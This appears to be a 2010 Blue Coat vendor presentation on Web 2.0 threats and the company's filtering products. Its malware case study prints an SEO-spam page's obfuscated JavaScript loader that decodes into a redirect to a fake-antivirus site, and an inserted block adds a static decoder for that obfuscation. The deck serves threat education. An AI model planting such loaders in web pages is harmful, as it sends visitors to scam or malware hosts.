Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved. Living in a Web 2.0 World (and how BCSI can help!) Mark Stanford SE Manager 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net



Agenda

Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples BCSI countermeasures: Layered Security Defenses


What is Web 2.0?

Applications & Services

Technologies & Programming Languages

Software & Systems


Web Evolution

[Diagram labels: Static Pages, Dynamic Pages, Interactive Pages; Publishing Model, Community Model; Single Host Pages, Multi-Host Pages; Nice to Have, Must Have]


Cyber Crime Evolution

[Diagram labels: Amateurs, Professionals; Ingenuity/Pride Driven, Profit Driven; Damage/Defacement, Data Collection/Identity; Visible, DoS; Invisible; Wide-spread, Fast; Targeted]


Web 2.0

Did NOT change…

the OSI model

the way IP addresses work

the way URLs are handled

the way Web Filtering works

DID change…

how information gets posted, even legitimate sites

how information may be presented

By 2012 the Internet will be 75X larger than in 2002

What is required to find/identify threats on the web


Web 2.0 Also Means 1 URL Leads to Many

12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time)

12 Domains, 246 URLs (www.bild.de, 31.03.2010, 10:17 a.m. German Time)


Malware Case Study


WebPulse saw a new referrer…


WebPulse


Nothing here…


<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746>

<style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3><strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45 <strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font color=#41FE63 style="font-size: 12px;">linksys 54g install</font>


So… How did the User get there?


Interesting…


<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746><script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1');</script><style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3><strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));}</script>

<script>document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169";</script>
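
The decoding step shown on this slide can be reproduced statically, treating the page's script as data instead of letting it run. The following is an added example, not code from the presentation: the sample page and its redirector.example URL are constructed, and the scan assumes the decoder keeps the name dF as it does on the slide.

```javascript
// Added example: statically decode the dF() obfuscation layer shown above.
// Nothing from the page is executed; the script text is treated as data.

// Percent-decoding equivalent to legacy unescape(): handles %XX and %uXXXX.
function pctDecode(s) {
  return s.replace(/%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Same arithmetic as dF() on the slide, but returns the text instead of
// calling document.write(). The last character of the argument is the key.
function decodeDF(arg) {
  const key = arg.slice(-1);
  if (!/^[0-9]$/.test(key)) throw new Error("argument does not end in a digit key");
  const shifted = pctDecode(arg.slice(0, -1));
  let out = "";
  for (let i = 0; i < shifted.length; i++) {
    out += String.fromCharCode(shifted.charCodeAt(i) - Number(key));
  }
  return pctDecode(out);
}

// Scan raw HTML for dF('...') calls and report what each one would have
// written, plus any script-driven redirect target in the decoded text.
function analyzePage(html) {
  const findings = [];
  for (const m of html.matchAll(/\bdF\(\s*(['"])(.*?)\1\s*\)/g)) {
    let decoded;
    try {
      decoded = decodeDF(m[2]);
    } catch (e) {
      findings.push({ error: e.message, raw: m[2] });
      continue;
    }
    const loc = decoded.match(/location(?:\.href)?\s*=\s*["']([^"']+)["']/);
    findings.push({ decoded, redirect: loc ? loc[1] : null });
  }
  return {
    // Stage 1 on the slide: the decoder itself is hidden behind unescape().
    hiddenDecoder: /document\.write\(\s*unescape\(/.test(html),
    findings,
  };
}

// Constructed sample (not captured traffic): same two-stage layout as the
// slide, with a placeholder redirect target under the reserved .example TLD.
const SAMPLE_PAGE =
  '<html><body><script language="javascript">' +
  "document.write(unescape('%3Cscript%3E%3C%2Fscript%3E'));" +
  "dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00" +
  "sfejsfdups/fybnqmf0jo/qiq%264Gje%264E8%2633%264C%264D0tdsjqu%264F1');" +
  "</script><h3>Install Keys Satellite</h3></body></html>";

const report = analyzePage(SAMPLE_PAGE);
console.log(report.hiddenDecoder, report.findings);
```

A gateway or crawler that sees only the raw HTML finds no URL in it; the redirect target appears only after both decoding passes.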


“A friendly piece of advice…”


“You are in trouble…”


“This is very serious”


Web 2.0 Examples - Twitter

Still a toy or already a tool?


Web 2.0 Examples - Mashups


Web 2.0 Examples - Facebook

Still a toy or already a tool?


Koobface worm (January 2009)

• Invitation to click on a link in Facebook or Myspace in-box
• Supposedly a link to a funny video
• Users were told that they have to update their flash player to view the video
• The installed SW was a proxy server
• Now selected traffic could be redirected to the attacker
• A second program to download and install arbitrary code was installed, too

Like magic, the infected computer is now a zombie, under the control of unknown villains


Changing Web Habits

Top 10 Categories – 2009
WebFilter/WebPulse, 62M+ Users

1. Social Networking
2. Web Advertisements
3. Search Engines/Portals
4. Personals/Dating
5. Pornography
6. Computers/Internet
7. Audio/Video Clips
8. Adult/Mature Content
9. Web Email
10. Illegal/Questionable

Social Networking
• Moved to #1 from #2 position
• Represents 25% of Top10 requests

Web Email
• Dropped to #9 from #5 position
• Users migrating to social networking

Cyber Crime Leverages
• Search engine poisoning
• Fake AV and Codec updates
• Popular site injections
• Death, Drama & Disaster lures
• Health & Wealth scams


Layered Security Defenses


Blue Coat Layered Defenses

• Cloud Service: WebPulse & WebFilter
• Inline Threat Detection: ProxyAV
• Web Application & Content Controls: ProxySG
• Integrated Data Loss Prevention: ProxySG with 6 DLP partners
• Remote Users: ProxyClient


Hybrid Design

Architected to Deliver On-Demand Security Intelligence

• Industry’s leading collaborative cloud defense with 62M users
• Real-time inputs of any new web content and dynamic links
• Web protection, visibility, and reporting in any location

Web Gateway Protection
• Inline threat analysis w/SSL
• Web filtering & content controls
• Media optimization + B/W Mgmt

Cloud Defenses
• Real-time web content ratings
• Web threat & malware detection
• Reputation ratings

• URL Filtering & Reporting
• Cloud threat protection

[Diagram labels: Web, WAN, ProxySG & ProxyAV, WebFilter, WebPulse, ProxyClient, Remote Users, Reporter]


Blue Coat Secure Web Gateway

[Diagram labels: Malware Scanning, Protocol Compliance, Content Filters, Data Types, Active Content, URL Filtering, AAA Policy, Certificate Validation, Method Controls, BCWF, WebPulse, Reporter, Log Files, Object Cache, Bandwidth Management, Protocol Optimization]

ProxyAV:
- Behavior based analysis
- Signatures


Preserve Productivity

BCWF Malware Identification Strategy
Dynamic Link Analysis

A. Popular Web Site Pointers
B. Middle Relay Servers & Link Farms
C. Malware Download Hosts


Dynamic Link Analysis

• Cloud connected community that is broad and diverse
• Real-time input of new web links to the cloud service
• Immediate analysis of URL chain for threats & rating
• Update master database in cloud to protect all members

Cloud Community


Dynamic Link Analysis

• Cloud connected community that is broad and diverse
• Real-time input of new web links to the cloud service
• Immediate analysis of URL for threats & rating
• Update master database in cloud to protect all members

Cloud Community


Dynamic Link Analysis

• Cloud connected community that is broad and diverse
• Real-time input of new web links to the cloud service
• Immediate analysis of full link chain for threats & rating
• Update master database in cloud to protect all members

Protects

Web Gateways

Remote Users

Cloud Community


WebPulse: First Complete DLA solution

• New defense layer
• Full Dynamic link analysis
• Foundation for next generation URL filtering
• Fast, Aware, Protective… for anyone, anywhere

Protects
• Web Gateways
• Remote Users

[Diagram labels: Cloud Community; WebPulse, 62M Users; WebFilter, 2B reqs/week; ProxySG; ProxyClient; K9]


WebPulse Clients: K-9 Web Protect, ProxyClient, ProxySG, ProxyAV (BCWF Full List)

• “Uncategorized” sent to WebPulse for Dynamic categorization
• 62M+ User Community
• 45B+ requests/week
• Fully Configurable and Secure
• 5 Min for security updates

Rating Servers
• 300M Unique requests daily
• 1.2B requests “rated” weekly
• 50 languages
• Fast (ms) – try it!

Threat Analysis
• 16 Sources
• Signatures
• Behavior
• Heuristics
• Reputation
• Sandboxing

Deep Background Rating Analysis (DBRA)
• 2 Secs – 2hrs
• RTT Balanced

[Diagram labels: Real Time Boundary, WebPulse Clients, WebPulse Cloud Service, Dynamic URL Cache, URL & Content Trainers, URL, Malware, Master Rating Database VA, ANZ, CA, HK, UK]


ProxyAV: Co-Processor Architecture

• Improved utilization with M:N ratio
• Higher throughput per gateway
• Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible)
• Optimized design

• Patience Page
• Trickle First
• Trickle Last
• Defer Scan (media)

[Diagram labels: Enterprise Network, Internet, ProxySG, ProxyAV, Clean Object Cache, Finger Print Cache, Dual Cache Design; ICAP, ICAP+, S-ICAP]


ProxyAV – anti-malware features

• Don’t get confused by the name “AV”
• Anti-malware features are more comprehensive than traditional pattern matching technologies
  • Behavioral analysis
  • Sandboxing
  • Heuristics
  • True file type detection
  • Etc.
• ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249)
  Note: Finjan was not able to block the exploit without a security update

It is a different approach and philosophy


ProxyClient included with WebFilter

Remote Filtering Cloud Connected Threat Protection Acceleration Central Policy Reporting


Why Blue Coat Products?

• Unmatched policy controls & authentication options
• Proactive Malware/MMC detection
• Real-time web content analysis/DLA for gateway & client
• URL database, threat detection, and DLP partners
• Custom object-based OS with patented cache technologies
• Broad proxy library & acceleration techniques
• Bandwidth management & protocol optimization/compliance
• Experience, Reliability, Performance

All the RIGHT parts!

Blue Coat Confidential Information


Questions?
